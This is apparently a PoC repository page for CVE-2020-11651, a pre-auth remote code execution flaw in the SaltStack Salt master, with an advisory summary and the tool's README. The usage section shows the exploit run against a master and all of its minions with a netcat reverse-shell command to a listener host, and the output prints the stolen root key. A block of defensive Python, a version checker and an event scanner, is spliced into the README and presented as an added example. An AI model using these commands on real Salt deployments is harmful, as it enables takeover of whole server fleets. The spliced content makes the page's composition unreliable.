
CVE-2020-11651 PoC — SaltStack Salt security vulnerability

Source
Associated Vulnerability
Title: SaltStack Salt security vulnerability (CVE-2020-11651)
Description: SaltStack Salt is SaltStack's open-source tool set for managing infrastructure; it provides configuration management, remote execution and related functions. Salt versions before 2019.2.4 and 3000.x versions before 3000.2 contain a security vulnerability: the ClearFuncs class of the salt-master process does not properly validate method calls. A remote attacker can exploit this flaw to retrieve user tokens or execute arbitrary commands.
Readme
# CVE-2020-11651

This is a POC for CVE-2020-11651, which obtains pre-auth RCE on a Salt master and/or all of its associated minions. Some light details on the issue [are here](https://labs.f-secure.com/advisories/saltstack-authorization-bypass). A POC for CVE-2020-11652 is not included.

This obtains command execution on the master by creating a runner of `salt.cmd` with the function `cmd.exec_code`. No interactivity is implemented; you'll need to catch a reverse shell.
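Two defender-side checks that follow from the mechanism just described, written as an added example (not code from this PoC or from Salt): a version test against the fixed releases named in the vulnerability description (2019.2.4 and 3000.2), and a scan of master runner events for the `salt.cmd` / `cmd.exec_code` combination the PoC drives. The event record shape and field names are an assumption, and the sample records are constructed.

```python
import re

# Fixed releases from the vulnerability description: everything before 2019.2.4
# and 3000.x before 3000.2 are affected. Later major lines are not in scope here.
FIXED_LEGACY = (2019, 2, 4)
FIXED_3000 = (3000, 2)

def parse_version(v: str) -> tuple:
    """'2019.2.3' -> (2019, 2, 3); '3000' -> (3000,); '+ds-1' suffixes ignored."""
    m = re.match(r"\s*(\d+(?:\.\d+)*)", v)
    if not m:
        raise ValueError(f"unrecognised Salt version: {v!r}")
    return tuple(int(p) for p in m.group(1).split("."))

def is_vulnerable(v: str) -> bool:
    """True if the version falls in one of the two affected ranges."""
    ver = parse_version(v)
    if ver[0] >= 3001:          # outside the ranges the description lists
        return False
    if ver[0] == 3000:          # 3000 and 3000.1 affected; 3000.2 fixed
        return ver < FIXED_3000
    return ver < FIXED_LEGACY   # any YYYY.M.P release before 2019.2.4

# Assumed shape of salt master runner events (field names are an assumption):
# tag 'salt/run/<jid>/new', data carrying 'fun' and 'fun_args'. Records are
# constructed for this example; the first jid is the one in the README output.
SAMPLE_EVENTS = [
    {"tag": "salt/run/20200504080050593352/new",
     "data": {"fun": "runner.salt.cmd",
              "fun_args": ["cmd.exec_code", "python3", "<python source>"],
              "user": "root"}},
    {"tag": "salt/run/20200504080100000000/new",
     "data": {"fun": "runner.jobs.list_jobs", "fun_args": [], "user": "ops"}},
    {"tag": "salt/job/20200504080200000000/new",
     "data": {"fun": "test.ping", "arg": []}},
]

def suspicious_runner_events(events) -> list:
    """Tags of runner events invoking salt.cmd with cmd.exec_code, the pair the
    PoC uses for execution on the master. Legitimate use should be rare and
    known, so every hit deserves review against change records."""
    hits = []
    for ev in events:
        if not ev.get("tag", "").startswith("salt/run/"):
            continue
        data = ev.get("data", {})
        args = " ".join(str(a) for a in data.get("fun_args", []))
        if data.get("fun", "").endswith("salt.cmd") and "cmd.exec_code" in args:
            hits.append(ev["tag"])
    return hits
```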

## Usage

Tested on Debian 10 against a Debian 10 instance. Needs ncat to receive and send a shell, and `pip3 install salt` for the transport library.

```
user@debian10:~$ ./cve-2020-11651.py 192.168.200.135 master 'nc 192.168.200.137 4444 -e "/bin/bash"'
/usr/local/lib/python3.7/dist-packages/salt/ext/tornado/httputil.py:107: DeprecationWarning: Using or importing the ABCs from 'collections' instead of from 'collections.abc' is deprecated, and in 3.8 it will stop working
  class HTTPHeaders(collections.MutableMapping):
Attempting to ping master at 192.168.200.135
Retrieved root key: ajazew2a7V7gaxT2e5Vyi1pALtWYLOCp3L+A3xYc1iilwZEPhbnERhhGvzrDh8NVa2x0xNvYIJE=
Got response for attempting master shell: {'tag': 'salt/run/20200504080050593352', 'jid': '20200504080050593352'}. Looks promising!

user@debian10:~$ ./cve-2020-11651.py 192.168.200.135 minions 'nc 192.168.200.137 4444 -e "/bin/bash"'
/usr/local/lib/python3.7/dist-packages/salt/ext/tornado/httputil.py:107: DeprecationWarning: Using or importing the ABCs from 'collections' instead of from 'collections.abc' is deprecated, and in 3.8 it will stop working
  class HTTPHeaders(collections.MutableMapping):
Attempting to ping master at 192.168.200.135
Retrieved root key: ajazew2a7V7gaxT2e5Vyi1pALtWYLOCp3L+A3xYc1iilwZEPhbnERhhGvzrDh8NVa2x0xNvYIJE=
Sending command to all minions on master

user@debian10:~$ ./cve-2020-11651.py 192.168.200.135 fetchkeyonly
/usr/local/lib/python3.7/dist-packages/salt/ext/tornado/httputil.py:107: DeprecationWarning: Using or importing the ABCs from 'collections' instead of from 'collections.abc' is deprecated, and in 3.8 it will stop working
  class HTTPHeaders(collections.MutableMapping):
Attempting to ping master at 192.168.200.135
Retrieved root key: ajazew2a7V7gaxT2e5Vyi1pALtWYLOCp3L+A3xYc1iilwZEPhbnERhhGvzrDh8NVa2x0xNvYIJE=
user@debian10:~$ 

```

![saltstack](https://raw.githubusercontent.com/dozernz/cve-2020-11651/master/saltstack.PNG)
File Snapshot

```
[4.0K] /data/pocs/66e5d012a52932d01cd930acfc35d8ba0e425976
├── [4.2K] CVE-2020-11651.py
├── [2.4K] README.md
└── [ 57K] saltstack.PNG

0 directories, 3 files
```